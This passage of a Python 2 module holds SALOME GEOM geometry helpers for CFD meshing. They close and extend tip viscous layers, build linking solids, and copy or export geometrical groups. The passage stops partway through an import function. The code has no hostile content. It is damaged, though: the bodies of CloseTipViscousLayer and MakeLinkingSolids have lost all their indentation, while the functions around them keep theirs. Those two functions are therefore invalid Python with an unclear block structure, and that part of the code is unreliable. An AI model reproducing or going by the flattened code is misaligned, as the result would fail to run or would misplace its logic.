							free_boundary_nodes = GetSubShapes(free_boundary)[0]
							plane = geompy.MakePlaneThreePnt(free_boundary_nodes[0], free_boundary_nodes[1], free_boundary_nodes[2], free_boundary_length * 1e3)
							common = geompy.MakeCommon(free_boundary, plane)
							if GeometricalEquality([free_boundary, common], tol = 1) == True:
								break
						try:
							filling_shell = geompy.MakeGlueEdges(filling_shell, gluing_tolerance)
						except:
							try:
								tmp_shape = geompy.MakeSewing(filling_shell, gluing_tolerance)
								if tmp_shape != None:
									filling_shell = tmp_shape
							except:
								AddToStudy(filling_shell, "ProblematicShape")
								print "[X] Some internal shape could not be glued."; return
						gluing_tolerance *= 2
					#-
					# Get the missing face wire
					filling_shell_hole_wire = geompy.GetFreeBoundary(filling_shell)[1][0]
					#-
					# Create the missing face
					try:
						filling_shell_missing_face = geompy.MakeFace(filling_shell_hole_wire, True)
					except:
						print "[X] One internal shell could not be closed."
						if add == True:
							AddToStudy(filling_shell, "ProblematicShape")
						return filling_shell
					#-
					# Create the final shell
					filling_shell = geompy.MakeShell([filling_shell, filling_shell_missing_face])
					#-
					# Create the solid
					solids.append(geompy.MakeSolid([filling_shell]))
				#-
				#-
				# Put the solids into a compound
				solids = geompy.MakeCompound(solids)
				#-
				# Glue faces into the compound
				try:
					solids = geompy.MakeGlueFaces(solids, tol * 1e2)
				except:
					print "[*] The glue operation failed on the final shape."
				#-
				# Add and return the resulting shape(s)
				if add == True:
					AddToStudy(solids, "TipViscousLayerExtension", father)
				return solids
	#-
etvl = ExtendTipViscousLayer # Short alias for ExtendTipViscousLayer (interactive-console convenience).
def CloseTipViscousLayer( shell_and_compound = [None], np = 20, tol = 1e-7, add = True, infa = False, dim = 3 ):
"""
Description:
Close a tip viscous layer.
Arguments:
# shell_and_compound
Description: the shell to close and its guiding edge compound.
Type: List of 1 Shell + 1 Compound of Edges
GUI selection: yes
Selection by name: yes
Recursive: -
Default value: [None]
# np
Description: See here.
Type: Integer
GUI selection: -
Selection by name: -
Recursive: -
Default value: 20
# tol
Description: See here.
Type: Float
GUI selection: -
Selection by name: -
Recursive: -
Default value: 1e-7
# add
Description: See here.
Type: Boolean
GUI selection: -
Selection by name: -
Recursive: -
Default value: True
# infa
Description: See here.
Type: Boolean
GUI selection: -
Selection by name: -
Recursive: -
Default value: False
# dim
Description: See here.
Type: Integer
GUI selection: -
Selection by name: -
Recursive: -
Default value: 3
Returned Values:
"dim" value: 1
"single" value: -
Type: Compound of Edges
Number: 4 or 6
Name: "TipViscousLayerClosing (Edges)"
"dim" value: 2
"single" value: -
Type: Compound of Faces
Number: 2 or 3
Name: "TipViscousLayerClosing (Faces)"
"dim" value: 3
"single" value: -
Type: Compound of Solids
Number: 1
Name: "TipViscousLayerClosing"
Conditions of use:
The input shell has to contain 2 faces having the shape of triangles or ellipse quarters and an optional middle face being a quadrangle. The edge compound has to have all the characteristics of a compound build with the CloseViscousLayer function.
"""
if isinstance(np, str): print "[X] The first argument (np) should be an integer ."; return
if isinstance(shell_and_compound, list) == False: print "[X] The second argument (shell_and_compound) should be an array."; return
if dim == 0: print "[X] There is no shape to return corresponding to the given dimension."; return
# Get the input shape(s)
shell_and_compound = GetGUISelection(shell_and_compound)
shell_and_compound = GetObject(shell_and_compound)
#-
# Check the input shape existence
if "error" in shell_and_compound or None in shell_and_compound: return
#-
# Check the number of selected objects
if len(shell_and_compound) != 2:
print "[X] Two objects should be selected."
return
#-
# Distinguish input shapes
shell = None
compound = None
for object in shell_and_compound:
nb_faces = int(geompy.WhatIs(object).split("\n")[3].split(": ")[1])
if nb_faces > 0:
shell = object
else:
compound = object
#-
# Set father object
father = None
if infa == True: father = compound
#-
if False: pass
else:# All checks done
# Check if the input shape is "shell-shaped"
shell_faces = GetSubShapes(shell)[2]
try:
shell = geompy.MakeShell(shell_faces)
except:
print "[X] The input 2D shape should be \"shell-shaped\"."; return
#-
# Keep edges touching the input shell
compound_edges = GetSubShapes(compound)[1]
edges_to_keep = []
for edge in compound_edges:
edge_vertexes = GetSubShapes(edge)[0]
distance_1 = geompy.MinDistance(edge_vertexes[0], shell)
distance_2 = geompy.MinDistance(edge_vertexes[1], shell)
distances = [distance_1, distance_2]
if max(distances) > tol:
edges_to_keep.append(edge)
compound = geompy.MakeCompound(edges_to_keep)
#-
shapes_to_return = []
# Get the sub-shapes
[shell, compound] = GetSubShapes([shell, compound])
#-
# Get the start edges
start_edges = []
for shell_edge in shell[1]:# For each edge in the face compound...
shell_edge_vertexes = geompy.SubShapeAll(shell_edge, geompy.ShapeType["VERTEX"])
# Get the number of adjacent face
nb_adjacent_faces = 0
for face in shell[2]:
nb_contacts = 0
for shell_edge_vertex in shell_edge_vertexes:
min_distance = geompy.MinDistance(shell_edge_vertex, face)
if min_distance <= tol:
nb_contacts += 1
if nb_contacts == 2:
nb_adjacent_faces += 1
#-
# Get the number of contact with the edge compound
nb_contacts = 0
for shell_edge_vertex in shell_edge_vertexes:
min_distance = geompy.MinDistance(shell_edge_vertex, compound[-1])
if min_distance <= tol:
nb_contacts += 1
#-
# Add the edge to the start edge list
if nb_adjacent_faces == 1 and nb_contacts == 1:
start_edges.append(shell_edge)
#-
#-
# Make the outside solids
solids = []
for start_edge in start_edges:# For each start edge...
start_edge_vertexes = geompy.SubShapeAll(start_edge, geompy.ShapeType["VERTEX"])
# Get the adjacent face
adjacent_face = None
for face in shell[2]:
nb_contacts = 0
for start_edge_vertex in start_edge_vertexes:
min_distance = geompy.MinDistance(start_edge_vertex, face)
if min_distance <= tol:
nb_contacts += 1
if nb_contacts == 2:
adjacent_face = face
break
#-
# Get the center vertex
center_vertex = None
adjacent_face_vertexes = geompy.SubShapeAll(adjacent_face, geompy.ShapeType["VERTEX"])
for adjacent_face_vertex in adjacent_face_vertexes:
min_distance = geompy.MinDistance(adjacent_face_vertex, start_edge)
if min_distance > tol:
center_vertex = adjacent_face_vertex
break
#-
# Get the start vertex
start_vertex = None
for adjacent_face_vertex in adjacent_face_vertexes:
min_distance = geompy.MinDistance(adjacent_face_vertex, compound[-1])
if min_distance > tol:
start_vertex = adjacent_face_vertex
break
#-
# Get the center edge
center_edge = geompy.MakeEdge(center_vertex, start_vertex)
#-
# Get the path edge
path_edge = None
for edge in compound[1]:
min_distance = geompy.MinDistance(edge, start_edge)
if min_distance <= tol:
path_edge = edge
break
#-
# Get the edge style
start_edge_length = geompy.BasicProperties(start_edge)[0]
rebuilt_straight_start_edge = geompy.MakeEdge(start_edge_vertexes[0], start_edge_vertexes[1])
rebuilt_straight_start_edge_length = geompy.BasicProperties(rebuilt_straight_start_edge)[0]
if abs(start_edge_length - rebuilt_straight_start_edge_length) <= tol:
style = "straight"
else:
style = "smooth"
#-
# Create the filling edges
start_face = None
end_face = None
filling_edges_2d = []
filling_edges_3d = []
for parameter in [n / float(np - 1) for n in range(np)]:
# Create the vertexes
length = geompy.BasicProperties(path_edge)[0]
vertex = geompy.MakeVertexOnCurveByLength(path_edge, parameter * length)
#-
# Create the filling edge
if style == "straight":
filling_edge_3d = geompy.MakeEdge(start_vertex, vertex)
elif style == "smooth":
filling_edge_3d = geompy.MakeArcOfEllipse(center_vertex, start_vertex, vertex)
filling_edge_2d = geompy.MakeEdge(center_vertex, vertex)
filling_edges_3d.append(filling_edge_3d)
filling_edges_2d.append(filling_edge_2d)
#-
if parameter == 0:
# Create the start face
start_face_wire = geompy.MakeWire([center_edge, filling_edge_2d, filling_edge_3d])
start_face = geompy.MakeFace(start_face_wire, True)
#-
if parameter == 1:
# Create the end face
end_face_wire = geompy.MakeWire([center_edge, filling_edge_2d, filling_edge_3d])
end_face = geompy.MakeFace(end_face_wire, True)
#-
# Create the filling edge compounds
filling_edge_compound_2d = geompy.MakeCompound(filling_edges_2d)
filling_edge_compound_3d = geompy.MakeCompound(filling_edges_3d)
#-
if dim == 1:
shapes_to_return.append(filling_edge_compound_2d)
shapes_to_return.append(filling_edge_compound_3d)
else:
# Create the fillings
filling_2d = geompy.MakeFilling(filling_edge_compound_2d, theMaxDeg = 20, theNbIter = 1, theTol2D = 1e-5, theTol3D = 1e-5, theMethod = GEOM.FOM_AutoCorrect)
filling_3d = geompy.MakeFilling(filling_edge_compound_3d, theMaxDeg = 20, theNbIter = 1, theTol2D = 1e-5, theTol3D = 1e-5, theMethod = GEOM.FOM_AutoCorrect)
#-
# Remove the extra edges
filling_2d = RemoveFaceExtraEdges(filling_2d, add = False)
filling_3d = RemoveFaceExtraEdges(filling_3d, add = False)
#-
# Create the filling compound
filling_shell = geompy.MakeShell([start_face, end_face, filling_2d, filling_3d])
#-
if dim == 2:
shapes_to_return.append(filling_shell)
else:
# Sew the shell
sewing_tolerance = tol
while True:
free_boundaries = geompy.GetFreeBoundary(filling_shell)[1]
if len(free_boundaries) == 0:
break
filling_shell = geompy.MakeSewing(filling_shell, sewing_tolerance)
sewing_tolerance *= 2
#-
# Create the solid
solids.append(geompy.MakeSolid([filling_shell]))
#-
#-
# Get the inside face
inside_faces = []
for face in shell[2]:
nb_adjacent_start_edges = 0
for start_edge in start_edges:
start_edge_vertexes = geompy.SubShapeAll(start_edge, geompy.ShapeType["VERTEX"])
nb_contacts = 0
for start_edge_vertex in start_edge_vertexes:
min_distance = geompy.MinDistance(start_edge_vertex, face)
if min_distance <= tol:
nb_contacts += 1
if nb_contacts >= 2:
nb_adjacent_start_edges += 1
if nb_adjacent_start_edges == 0:
inside_faces.append(face)
#-
# Create the inside solid
for inside_face in inside_faces:# For inside face...
inside_face_edges = geompy.SubShapeAll(inside_face, geompy.ShapeType["EDGE"])
path_edges = []
center_edge = None
for inside_face_edge in inside_face_edges:
# Get the center edge
nb_contacts = 0
inside_face_edge_vertexes = geompy.SubShapeAll(inside_face_edge, geompy.ShapeType["VERTEX"])
for inside_face_edge_vertex in inside_face_edge_vertexes:
min_distance = geompy.MinDistance(inside_face_edge_vertex, compound[-1])
if min_distance <= tol:
nb_contacts += 1
if nb_contacts == 2:
center_edge = inside_face_edge
#-
# Get the first path edge
min_distance = geompy.MinDistance(inside_face_edge, compound[-1])
if min_distance > tol:
path_edges.append(inside_face_edge)
#-
# Get the second path edge
for edge in compound[1]:
min_distance = geompy.MinDistance(shell[-1], edge)
if min_distance > tol:
path_edges.append(edge)
#-
# Create filling edges
filling_edges_2d = []
filling_edges_3d = []
# Get the start vertexes
length_0 = geompy.BasicProperties(center_edge)[0]
length_1 = geompy.BasicProperties(path_edges[0])[0]
length_2 = geompy.BasicProperties(path_edges[1])[0]
first_vertex_0 = geompy.SubShapeAll(center_edge, geompy.ShapeType["VERTEX"])[0]
first_vertex_1 = geompy.SubShapeAll(path_edges[0], geompy.ShapeType["VERTEX"])[0]
last_vertex_1 = geompy.SubShapeAll(path_edges[0], geompy.ShapeType["VERTEX"])[1]
first_vertex_1_adjacent_edge = None
for edge in compound[1]:
min_distance = geompy.MinDistance(edge, first_vertex_0)
if min_distance <= tol:
first_vertex_1_adjacent_edge = edge
break
path_edge_vertexes = geompy.SubShapeAll(path_edges[1], geompy.ShapeType["VERTEX"])
first_vertex_2 = None
last_vertex_2 = None
for path_edge_vertex in path_edge_vertexes:
min_distance = geompy.MinDistance(path_edge_vertex, first_vertex_1_adjacent_edge)
if min_distance <= tol:
first_vertex_2 = path_edge_vertex
else:
last_vertex_2 = path_edge_vertex
#-
# Create the start face and end face edges
center_edge_vertexes = geompy.SubShapeAll(center_edge, geompy.ShapeType["VERTEX"])
start_face_edge_1 = geompy.MakeEdge(first_vertex_0, first_vertex_1)
start_face_edge_2 = geompy.MakeEdge(first_vertex_0, first_vertex_2)
end_face_edge_1 = geompy.MakeEdge(center_edge_vertexes[1], last_vertex_1)
end_face_edge_2 = geompy.MakeEdge(center_edge_vertexes[1], last_vertex_2)
#-
for parameter in [n / float(np - 1) for n in range(np)]:
# Create the vertexes
vertex_0 = geompy.MakeVertexOnCurveByLength(center_edge, parameter * length_0, first_vertex_0)
vertex_1 = geompy.MakeVertexOnCurveByLength(path_edges[0], parameter * length_1, first_vertex_1)
vertex_2 = geompy.MakeVertexOnCurveByLength(path_edges[1], parameter * length_2, first_vertex_2)
#-
# Create the filling edges 3D
if style == "straight":
filling_edge_3d = geompy.MakeEdge(vertex_1, vertex_2)
elif style == "smooth":
filling_edge_3d = geompy.MakeArcOfEllipse(vertex_0, vertex_1, vertex_2)
filling_edges_3d.append(filling_edge_3d)
#-
# Create the filling edges 2D
filling_edge_2d = geompy.MakeEdge(vertex_0, vertex_2)
filling_edges_2d.append(filling_edge_2d)
#-
if parameter == 0:
# Create the start face
start_face_wire = geompy.MakeWire([start_face_edge_1, start_face_edge_2, filling_edge_3d])
start_face = geompy.MakeFace(start_face_wire, True)
#-
if parameter == 1:
# Create the end face
end_face_wire = geompy.MakeWire([end_face_edge_1, end_face_edge_2, filling_edge_3d])
end_face = geompy.MakeFace(end_face_wire, True)
#-
#-
# Create the filling edge compounds
filling_edge_compound_2d = geompy.MakeCompound(filling_edges_2d)
filling_edge_compound_3d = geompy.MakeCompound(filling_edges_3d)
#-
if dim == 1:
shapes_to_return.append(filling_edge_compound_2d)
shapes_to_return.append(filling_edge_compound_3d)
else:
# Create the fillings
filling_2d = geompy.MakeFilling(filling_edge_compound_2d, theMaxDeg = 20, theNbIter = 1, theTol2D = 1e-5, theTol3D = 1e-5, theMethod = GEOM.FOM_AutoCorrect)
filling_3d = geompy.MakeFilling(filling_edge_compound_3d, theMaxDeg = 20, theNbIter = 1, theTol2D = 1e-5, theTol3D = 1e-5, theMethod = GEOM.FOM_AutoCorrect)
#-
# Create the filling compound
filling_shell = geompy.MakeShell([inside_face, start_face, end_face, filling_2d, filling_3d])
#-
if dim == 2:
shapes_to_return.append(filling_shell)
else:
# Sew the shell
sewing_tolerance = tol * 1e2
while True:
free_boundaries = geompy.GetFreeBoundary(filling_shell)[1]
if len(free_boundaries) == 0:
break
filling_shell = geompy.MakeSewing(filling_shell, sewing_tolerance)
sewing_tolerance *= 2
#-
# Create the solid
solids.append(geompy.MakeSolid([filling_shell]))
#-
#-
if dim == 1:
if add == True:
AddToStudy(shapes_to_return, "TipViscousLayerClosing (Edges)", father)
return shapes_to_return
elif dim == 2:
if add == True:
AddToStudy(shapes_to_return, "TipViscousLayerClosing (Faces)", father)
return shapes_to_return
else:
# Put the solids into a compound
solids = geompy.MakeCompound(solids)
#-
# Glue faces into the compound
try:
solids = geompy.MakeGlueFaces(solids, tol * 1e2)
except:
print "[*] The glue operation failed on the final shape."
#-
# Add and return the resulting shape(s)
if add == True:
AddToStudy(solids, "TipViscousLayerClosing", father)
return solids
#-
ctvl = CloseTipViscousLayer # Short alias for CloseTipViscousLayer (interactive-console convenience).
def MakeLinkingSolids( face_and_edge_compounds = [None], tol = 1e-7, add = True, dim = 3 ):
"""
Description:
Creates solids linking two sets of faces.
Arguments:
# face_and_edge_compounds
Description: The faces compounds to link + the linking edge compound.
Type: List of 2 Compounds of Faces + 1 Compound of Edges
GUI selection: yes
Selection by name: yes
Recursive: -
Default value: [None]
# tol
Description: See here.
Type: Float
GUI selection: -
Selection by name: -
Recursive: -
Default value: 1e-7
# add
Description: See here.
Type: Boolean
GUI selection: -
Selection by name: -
Recursive: -
Default value: True
# dim
Description: See here.
Type: Integer
GUI selection: -
Selection by name: -
Recursive: -
Default value: 3
Returned Values:
"dim" value: 2
"single" value: -
Type: Compound of Faces
Number: n
Name: "LinkingSolids (Faces)"
"dim" value: 3
"single" value: -
Type: Compound of Solids
Number: 1
Name: "LinkingSolids"
Conditions of use:
All vertexes of one face compound have to be linked with another vertex from the second face compound.
"""
if isinstance(face_and_edge_compounds, list) == False: print "[X] The first argument (face_and_edge_compounds) should be an array."; return
if dim < 2: print "[X] There is no shape to return corresponding to the given dimension."; return
# Get the input shape(s)
face_and_edge_compounds = GetGUISelection(face_and_edge_compounds)
face_and_edge_compounds = GetObject(face_and_edge_compounds)
#-
# Check the input shape existence
if "error" in face_and_edge_compounds or None in face_and_edge_compounds: return
#-
# Check the number of selected objects
if len(face_and_edge_compounds) != 3:
print "[X] Three objects should be selected."
return
#-
# Distinguish input shapes
face_compounds = []
edge_compound = None
for object in face_and_edge_compounds:
nb_faces = int(geompy.WhatIs(object).split("\n")[3].split(": ")[1])
if nb_faces > 0:
face_compounds.append(object)
else:
edge_compound = object
#-
if False: pass
else:# All checks done
shapes_to_return = []
# Get the sub-shapes
#[face_compound1, face_compound2, edge_compound] = GetSubShapes(face_compounds + [edge_compound])
[face_compound2, face_compound1, edge_compound] = GetSubShapes(face_compounds + [edge_compound])
#-
# Create the solids
solids = []
for face_1 in face_compound1[2]:# For each face of the face compound 1...
# Get the linking edges
face_1_linking_edges = []
for edge in edge_compound[1]:
min_distance = geompy.MinDistance(edge, face_1)
if min_distance <= tol:
face_1_linking_edges.append(edge)
#-
# Get the target face
face_1_target_face = None
nb_face_1_linking_edges = len(face_1_linking_edges)
for face_2 in face_compound2[2]:
nb_contact = 0
for face_1_linking_edge in face_1_linking_edges:
min_distance = geompy.MinDistance(face_1_linking_edge, face_2)
if min_distance <= tol:
nb_contact += 1
if nb_contact == nb_face_1_linking_edges:
face_1_target_face = face_2
break
#-
# Create the linking fillings
face_1_linking_fillings = []
face_1_edges = geompy.SubShapeAll(face_1, geompy.ShapeType["EDGE"])
face_1_target_face_edges = geompy.SubShapeAll(face_1_target_face, geompy.ShapeType["EDGE"])
for face_1_edge in face_1_edges:# For each edge of the face 1...
# Get the linking edges
face_1_edge_linking_edges = []
for face_1_linking_edge in face_1_linking_edges:
min_distance = geompy.MinDistance(face_1_linking_edge, face_1_edge)
if min_distance <= tol:
face_1_edge_linking_edges.append(face_1_linking_edge)
#-
# Get the target edge
face_1_edge_target_edge = None
for face_1_target_face_edge in face_1_target_face_edges:
nb_contact = 0
for face_1_edge_linking_edge in face_1_edge_linking_edges:
min_distance = geompy.MinDistance(face_1_edge_linking_edge, face_1_target_face_edge)
if min_distance <= tol:
nb_contact += 1
if nb_contact == 2:
face_1_edge_target_edge = face_1_target_face_edge
#-
# Create the filling edge compound
filling_edge_compound = geompy.MakeCompound([face_1_edge, face_1_edge_target_edge])
#-
# Create the filling
face_1_linking_filling = geompy.MakeFilling(filling_edge_compound, theMethod = GEOM.FOM_AutoCorrect)
face_1_linking_fillings.append(face_1_linking_filling)
#-
#-
# Create the compound
face_1_shell = geompy.MakeShell([face_1, face_1_target_face] + face_1_linking_fillings)
#-
if dim == 2:
shapes_to_return.append(face_1_shell)
else:
# Sew the shell
sewing_tolerance = tol
while True:
free_boundaries = geompy.GetFreeBoundary(face_1_shell)[1]
if len(free_boundaries) == 0:
break
face_1_shell = geompy.MakeGlueEdges(face_1_shell, sewing_tolerance)
sewing_tolerance *= 2
#-
# Create the solid
face_1_shell = geompy.MakeShell([face_1_shell])
face_1_solid = geompy.MakeSolid([face_1_shell])
solids.append(face_1_solid)
#-
#-
if dim == 2:
if add == True:
AddToStudy(shapes_to_return, "LinkingSolids (Faces)")
return shapes_to_return
else:
# Put the solids into a compound
solids = geompy.MakeCompound(solids)
#-
# Glue faces
try:
solids = geompy.MakeGlueFaces(solids, tol)
except:
print "[*] The glue operation failed on the final shape."
#-
# Add and return the resulting shape(s)
if add == True:
AddToStudy(solids, "LinkingSolids")
return solids
#-
mls = MakeLinkingSolids # Short alias for MakeLinkingSolids (interactive-console convenience).
def CopyGeometricalGroups( shape1, shape2, only = [None], ignore = [None], type = None, tol = 1e-7, add = True ):
    """
    Description:
        Copies groups from a geometrical object to another according to the shape of group elements.
    Arguments:
        # shape1
            Description: the source geometrical object.
            Type: Any geometrical object
            GUI selection: -
            Selection by name: yes
            Recursive: -
            Default value: -
        # shape2
            Description: The target geometrical object.
            Type: Any geometrical object
            GUI selection: -
            Selection by name: yes
            Recursive: -
            Default value: -
        # only
            Description: The list of names of groups to copy, excluding the others.
            Type: List of Strings
            GUI selection: -
            Selection by name: -
            Recursive: -
            Default value: [None]
        # ignore
            Description: The list of names of groups to ignore.
            Type: List of Strings
            GUI selection: -
            Selection by name: -
            Recursive: -
            Default value: [None]
        # type
            Description: The type of groups to copy. Can equal "vertex", "edge", "face" or "solid".
            Type: String
            GUI selection: -
            Selection by name: -
            Recursive: -
            Default value: None
        # tol
            Description: See here.
            Type: Float
            GUI selection: -
            Selection by name: -
            Recursive: -
            Default value: 1e-7
        # add
            Description: See here.
            Type: Boolean
            GUI selection: -
            Selection by name: -
            Recursive: -
            Default value: True
    Returned Values:
        "dim" value: -
        "single" value: -
        Type: Group
        Number: n
        Name: The name of the source group
    Conditions of use:
        The groups inside the source shape must have each one a different name.
    """
    if add == True:
        # GUI component used later to display the created groups in the viewer
        gg = salome.ImportComponentGUI("GEOM")
    # Get the input shape(s)
    [shape1, shape2] = GetObject([shape1, shape2])
    #-
    # Check the input shape existence
    if "error" in [shape1, shape2] or None in [shape1, shape2]: return
    #-
    else:# All checks done
        # Get the list of the IDs of all the shapes visible in the study tree
        visible_ids = ListComponentShapes("GEOM", output = "ID")
        #-
        # Get the shape 1 groups, keeping only those published in the study tree
        groups_1 = geompy.GetGroups(shape1)
        visible_groups_1 = []
        for group_1 in groups_1:
            group_1_id = salome.ObjectToID(group_1)
            if group_1_id in visible_ids:
                visible_groups_1.append(group_1)
        #-
        # Sort the shape 1 groups (apply the "only", "ignore" and "type" filters in turn)
        sorted_shape_groups_1 = []
        if only != [None]:
            for visible_group_1 in visible_groups_1:
                visible_groups_name1 = visible_group_1.GetName()
                if visible_groups_name1 in only:
                    sorted_shape_groups_1.append(visible_group_1)
            visible_groups_1 = sorted_shape_groups_1
            sorted_shape_groups_1 = []
        if ignore != [None]:
            for visible_group_1 in visible_groups_1:
                visible_groups_name1 = visible_group_1.GetName()
                if visible_groups_name1 not in ignore:
                    sorted_shape_groups_1.append(visible_group_1)
            visible_groups_1 = sorted_shape_groups_1
            sorted_shape_groups_1 = []
        if type != None:
            for visible_group_1 in visible_groups_1:
                visible_group_type1 = str(visible_group_1.GetMaxShapeType())
                if visible_group_type1 == type.upper():
                    sorted_shape_groups_1.append(visible_group_1)
            visible_groups_1 = sorted_shape_groups_1
        #-
        # Get the shape 2 groups, keeping only those published in the study tree
        groups_2 = geompy.GetGroups(shape2)
        visible_groups_2 = []
        for group_2 in groups_2:
            group_2_id = salome.ObjectToID(group_2)
            if group_2_id in visible_ids:
                visible_groups_2.append(group_2)
        #-
        # Get the shape 2 group names
        visible_group_names_2 = [visible_group_2.GetName() for visible_group_2 in visible_groups_2]
        #-
        new_groups_2 = []
        for visible_group_1 in visible_groups_1:# For each of these groups...
            # Get the group name
            visible_group_1_name = visible_group_1.GetName()
            #-
            # Get the group type
            visible_group_1_type = str(visible_group_1.GetMaxShapeType())
            #-
            if visible_group_1_name in visible_group_names_2:# If the group already exists in the shape 2...
                # Delete this group (best effort: deletion failures are ignored)
                i = 0
                for visible_group_name_2 in visible_group_names_2:
                    if visible_group_1_name == visible_group_name_2:
                        try:
                            salome.geom.geomtools.GeomStudyTools().deleteShape(salome.ObjectToID(visible_groups_2[i]))
                        except:
                            pass
                        break
                    i += 1
            # Create the shape 2 group
            # NOTE(review): the group created here is immediately replaced by the
            # GetInPlace result below, so this CreateGroup call looks redundant —
            # confirm before removing it.
            new_group_2 = geompy.CreateGroup(shape2, geompy.ShapeType[visible_group_1_type])
            #if strict == False:
            try:
                new_group_2 = geompy.GetInPlace(shape2, visible_group_1)
            except:
                new_group_2 = None
            #else:
                #try:
                    #shape2MatchedSubShapes = geompy.GetSharedShapes(shape2, visible_group_1, geompy.ShapeType[visible_group_1_type])
                    #for shape2_matched_sub_shape in shape2_matched_sub_shapes:
                        #shape2MatchedSubShapeID = geompy.GetSubShapeID(shape2, shape2_matched_sub_shape)
                        #geompy.AddObject(new_group_2, shape2_matched_sub_shape_id)
                #except:
                    #new_group_2 = None
            #-
            # Add the group to the list (may be None when GetInPlace failed)
            new_groups_2.append(new_group_2)
            #-
            # Add the group to the study
            if new_group_2 != None:
                if add == True:
                    try:
                        id = geompy.addToStudyInFather(shape2, new_group_2, visible_group_1_name)
                        gg.createAndDisplayGO(id)
                        if salome.sg.hasDesktop():
                            salome.sg.updateObjBrowser(1)
                    except:
                        pass
            #-
        #-
        # Return the resulting shape(s)
        return new_groups_2
        #-
# NOTE(review): this refresh sits after the function's return statement in the
# original layout — either unreachable dead code inside the function or a
# module-level call executed at import time; confirm the intended placement.
salome.sg.updateObjBrowser(1)
# Short alias for CopyGeometricalGroups.
cgg = CopyGeometricalGroups
def ExportGeometricalGroups( shape = None, file = "cfdmsh_grps", only = [None], ignore = [None], type = None ):
    """
    Description:
        Exports into a file the geometrical groups of a geometrical object in the form of sets of subshape IDs.
    Arguments:
        # shape
            Description: The source geometrical object.
            Type: Any geometrical object
            GUI selection: yes
            Selection by name: yes
            Recursive: -
            Default value: None
        # file
            Description: The name of the file to write.
            Type: String
            GUI selection: -
            Selection by name: -
            Recursive: -
            Default value: "cfdmsh_grps"
        # only
            Description: The list of names of groups to export, excluding the others.
            Type: List of Strings
            GUI selection: -
            Selection by name: -
            Recursive: -
            Default value: [None]
        # ignore
            Description: The list of names of groups to ignore.
            Type: List of Strings
            GUI selection: -
            Selection by name: -
            Recursive: -
            Default value: [None]
        # type
            Description: Type of groups to export. Can equal "vertex", "edge", "face" or "solid".
            Type: String
            GUI selection: -
            Selection by name: -
            Recursive: -
            Default value: None
    Returned Values:
        "dim" value: -
        "single" value: -
        Type: -
        Number: -
        Name: -
    Conditions of use:
        -
    """
    # Get the input shape(s)
    shape = GetGUISelection(shape, uniq = True)
    shape = GetObject(shape)
    #-
    # Check the input shape existence
    if "error" in [shape] or None in [shape]: return
    #-
    else:# All checks done
        # Get the list of the IDs of all the shapes visible in the study tree
        visible_ids = ListComponentShapes("GEOM", output = "ID")
        #-
        # Get the groups, keeping only those published in the study tree
        shape_groups = geompy.GetGroups(shape)
        visible_shape_groups = []
        for shape_group in shape_groups:
            shape_group_id = salome.ObjectToID(shape_group)
            if shape_group_id in visible_ids:
                visible_shape_groups.append(shape_group)
        #-
        # Sort the groups (apply the "only", "ignore" and "type" filters in turn)
        sorted_shape_groups = []
        if only != [None]:
            for visible_group in visible_shape_groups:
                visible_shape_groups_name = visible_group.GetName()
                if visible_shape_groups_name in only:
                    sorted_shape_groups.append(visible_group)
            visible_shape_groups = sorted_shape_groups
            sorted_shape_groups = []
        if ignore != [None]:
            for visible_group in visible_shape_groups:
                visible_shape_groups_name = visible_group.GetName()
                if visible_shape_groups_name not in ignore:
                    sorted_shape_groups.append(visible_group)
            visible_shape_groups = sorted_shape_groups
            sorted_shape_groups = []
        if type != None:
            for visible_group in visible_shape_groups:
                visible_group_type = str(visible_group.GetMaxShapeType())
                if visible_group_type == type.upper():
                    sorted_shape_groups.append(visible_group)
            visible_shape_groups = sorted_shape_groups
        #-
        # Write the group file; "with" guarantees the file is closed even if a
        # geompy call raises (the original code leaked the handle in that case)
        with open(file, "w") as group_file:
            for visible_shape_group in visible_shape_groups:
                # Get the name of the group
                group_name = visible_shape_group.GetName()
                #-
                if group_name != "":
                    # Get the type of the group: the highest dimension with at
                    # least one element wins (solid > face > edge > vertex).
                    # Fix: the original code computed the type AFTER writing the
                    # group name, so an empty group raised a NameError (first
                    # group) or silently reused the previous group's type.
                    group_type = None
                    for type_name in ["SOLID", "FACE", "EDGE", "VERTEX"]:
                        if geompy.NbShapes(visible_shape_group, geompy.ShapeType[type_name]) > 0:
                            group_type = geompy.ShapeType[type_name]
                            break
                    if group_type == None:
                        # Empty group: nothing to export
                        continue
                    #-
                    # Write the name of the group
                    group_file.write("%s\n"%(group_name))
                    #-
                    # Write the type of the group
                    group_file.write("%s\n"%(group_type))
                    #-
                    # Write the IDs of the group elements (tab-separated, one
                    # line per group)
                    group_sub_shapes = geompy.SubShapeAll(visible_shape_group, group_type)
                    for sub_shape in group_sub_shapes:
                        sub_shape_id = geompy.GetSubShapeID(shape, sub_shape)
                        group_file.write("%s\t"%(sub_shape_id))
                    group_file.write("\n")
                    #-
        #-
egg = ExportGeometricalGroups
def ImportGeometricalGroups( shape = None, file = "cfdmsh_grps", only = [None], ignore = [None], type = None, add = True ):
    """
    Description:
        Imports from a file created with the ExportGeometricalGroups function into a geometrical object groups in the form of sets of subshape IDs.
    Arguments:
        # shape
            Description: The target geometrical object.
            Type: Any geometrical object
            GUI selection: yes
            Selection by name: yes
            Recursive: -
            Default value: None
        # file
            Description: The name of the file to read.
            Type: String
            GUI selection: -
            Selection by name: -
            Recursive: -
            Default value: "cfdmsh_grps"
        # only
            Description: The list of names of groups to export, excluding the others.
            Type: List of Strings
            GUI selection: -
            Selection by name: -
            Recursive: -
            Default value: [None]
        # ignore
            Description: The list of names of groups to ignore.
            Type: List of Strings
            GUI selection: -
            Selection by name: -
            Recursive: -
            Default value: [None]
        # type
            Description: Type of groups to export. Can equal "vertex", "edge", "face" or "solid".
            Type: String
            GUI selection: -
            Selection by name: -
            Recursive: -
            Default value: None
        # add
            Description: See here.
            Type: Boolean
            GUI selection: -
            Selection by name: -
            Recursive: -
            Default value: True
    Returned Values:
        "dim" value: -
        "single" value: -
        Type: Group
        Number: n
        Name: The name of the group in the file
    Conditions of use:
        -
    """
    if add == True: gg = salome.ImportComponentGUI("GEOM")
    # Get the input shape(s)
    shape = GetGUISelection(shape, uniq = True)
    shape = GetObject(shape)
    #-
    # Check the input shape existence
    if "error" in [shape] or None in [shape]: return
    #-
    else:# All checks done
        # Get the list of the IDs of all the shapes visible in the study tree
        visible_ids = ListComponentShapes("GEOM", output = "ID")
        #-
        # Get the already existing groups (only those published in the study tree)
        #oldGroups = geompy.GetGroups(shape)
        old_groups = geompy.GetGroups(shape)
        visible_old_groups = []
        for old_group in old_groups:
